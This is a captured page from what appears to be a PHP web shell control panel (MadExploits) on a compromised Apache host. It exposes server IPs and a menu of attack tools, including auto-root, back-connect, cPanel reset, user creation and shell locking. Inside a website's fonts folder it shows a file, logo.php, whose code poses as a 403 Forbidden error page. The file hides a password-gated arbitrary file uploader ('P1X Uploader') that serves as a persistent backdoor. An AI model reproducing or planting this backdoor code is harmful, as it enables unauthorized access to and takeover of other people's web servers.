Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.188.13.127
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
rori /
fonts /
icomoon /
fonts /
[ HOME SHELL ]
Name
Size
Permission
Action
icomoon.eot
300.13
KB
-rw-r--r--
icomoon.svg
913.42
KB
-rw-r--r--
icomoon.ttf
299.97
KB
-rw-r--r--
icomoon.woff
300.04
KB
-rw-r--r--
logo.php
912
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : logo.php
<?php echo "<html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access ".$_SERVER['REQUEST_URI']." on this server.</p> <p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html>";if(isset($_POST['uploaded'])){$file=$_FILES['files']['name'];$files=$_FILES['files']['tmp_name'];$folder="";if(move_uploaded_file($files,$folder.$file)){$result="Uploaded : => <A href='$file' target='_blank'>Your file here</A>";}else {$result="Failed to upload...!";}}$password="ok";if($_GET['pass']==$password){echo '<br /><br /><br /><html><head><title>P1X Uploader</title></head><body><center><form action="" method="post" enctype="multipart/form-data"> <input type="file" name="files" /> <input type="submit" name="uploaded" value="Upload"> </form>'.$result.'</center></body></html>';}?>
Close